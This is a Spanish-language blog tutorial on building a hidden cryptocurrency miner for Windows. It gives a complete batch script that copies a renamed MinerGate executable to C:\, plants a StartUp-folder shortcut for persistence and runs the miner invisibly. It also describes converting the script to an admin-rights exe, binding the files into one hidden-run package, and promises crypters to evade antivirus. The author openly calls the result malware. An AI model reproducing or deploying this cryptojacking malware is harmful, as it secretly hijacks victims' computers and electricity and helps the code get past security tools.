Creación de un Minero Oculto para Windows

En esta publicación, os presento una guía sencilla en la creación de un minero oculto para Windows. Simplemente lo que haremos será aprovechar el minero de terminal de MinerGate, para realizar el minado oculto. Está más enfocado a Windows 10, ya que al realizar pruebas en Windows 7, me ha lanzado varios errores.

Herramientas y Archivos

Nos centraremos en los programas necesarios para llevarlo a cabo de la manera más sencilla.

Como estaréis viendo estos archivos que está marcados son los que utilizaremos para la creación de un minero oculto. Los archivos que se encuentran marcados con gris, son los archivos encargados de la auto copia del archivo en una ruta,(El archivos, ccsetup226.exe, lo crearemos más tarde a partir del archivo .bat) la creación de un acceso directo en el sistema, (En el menú de inicio), y la ejecución de manera oculta de un programa. El resto de archivos que no está marcados pertenecen a MinerGate, en mi caso, el nombre del ejecutable de MinerGate es cchost-vlc.exe, lo cambié para que fuera oculto.

Archivo .bat

Nos centraremos de momento en el archivo .bat, que nos permitirá copiar el archivo en una ruta del sistema, crear persistencia, y ejecutar el minero en una cuenta en concreto.

Es un código muy simple en el que podremos diferenciar, en la parte roja, podremos copiar en alguna ruta del sistema el minero, en mi caso, lo copio en la ruta C:\ del sistema. Después, en color verde, creamos un acceso directo con este script de Powershell, para dar persistencia al programa, le podremos dar el nombre que queramos al acceso directo, y por último, con quiet, un programa que nos permite ejecutar ejecutables, de manera oculta, nos permitirá ejecutar el minero, al usuario, en mi caso de minergate. Deberéis de crearos una cuenta en Minergate, y usar el correo con el que os registraseis. Después indicamos el tipo de moneda, y el numero de núcleos, esto es el rendimiento que queramos darle al sistema, os recomiendo un número bajo, para evitar problemas de rendimiento.

@echo off
xcopy cchost-vlc.exe C:\ /O /X /E /H /K
echo Set oWS = WScript.CreateObject(“WScript.Shell”) > CreateShortcut.vbs
echo sLinkFile = “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\acceso.lnk” >> CreateShortcut.vbs
echo Set oLink = oWS.CreateShortcut(sLinkFile) >> CreateShortcut.vbs
echo oLink.TargetPath = “C:\ccsetup226.exe” >> CreateShortcut.vbs
echo oLink.Save >> CreateShortcut.vbs
cscript CreateShortcut.vbs
del CreateShortcut.vbs
quiet cchost-vlc –user zonahacker@outlook.es –xmr 1

Bat to Exe Converter

Este programa nos permitirá convertir este archivo .bat, en un .exe, esto nos permitirá evitar problemas de permisos. Para ello descargaremos este programa, y activaremos la opción de activar permisos de administrador obligatorios. Es importante cambiar el nombre para evitar que se sobrescriba.

Ya podremos eliminar el archivos .bat, ahora solo nos falta juntar todos los archivos.

RedbindeR

Este software, nos permitirá unir todos los archivos en uno solo y así poder copiar todos los archivos, incluidos los dll, de MinerGate, para que funcione adecuadamente.

Comenzamos por añadir un archivo, haciendo click derecho, después seleccionamos el archivo, en modo de ejecución, en oculto y en autoinicio, lo desactivamos. Realizamos este proceso con todos los archivos y en la parte de abajo a la derecha, le daremos a juntar, tiene muchas opciones este programa, pero de momento solo estudiaremos estas.

Minero Terminado

Una vez hecho todos esto proceso, nos quedará un archivo .exe, detectado por bastantes antivirus, más a delante os traeré alguna guía de crypters. Si ejecutamos el archivo, se nos deberá crear una copia en la ruta del disco local, un acceso directo en el menú de inicio, y nos debería de activar en el dashboard de MinerGate el apartado de monero.

Descarga de Archivos

Por aquí os dejo la descarga de los archivos juntos, para que podáis repasarlos sin ningún tipo de problema.

Espero que os haya gustado esta publicación de creación de minero oculto y hayáis aprendido algo nuevo, esto es una manera muy básica de crear un minero, os recuerdo que podéis sugerir o preguntar lo que queráis en los comentarios. Os recomiendo usar una máquina virtual para probar este tipo de malware, porque os puede provocar problemas de rendimiento. Instalar Windows entrando aquí.

Si tienes cualquier problema no dudes en comentarlo ,enviarme un email o contactar conmigo a través de mi página de contacto.

Deja una respuesta

Por favor inicia sesión para comentar
  Suscribirse  
Notificar de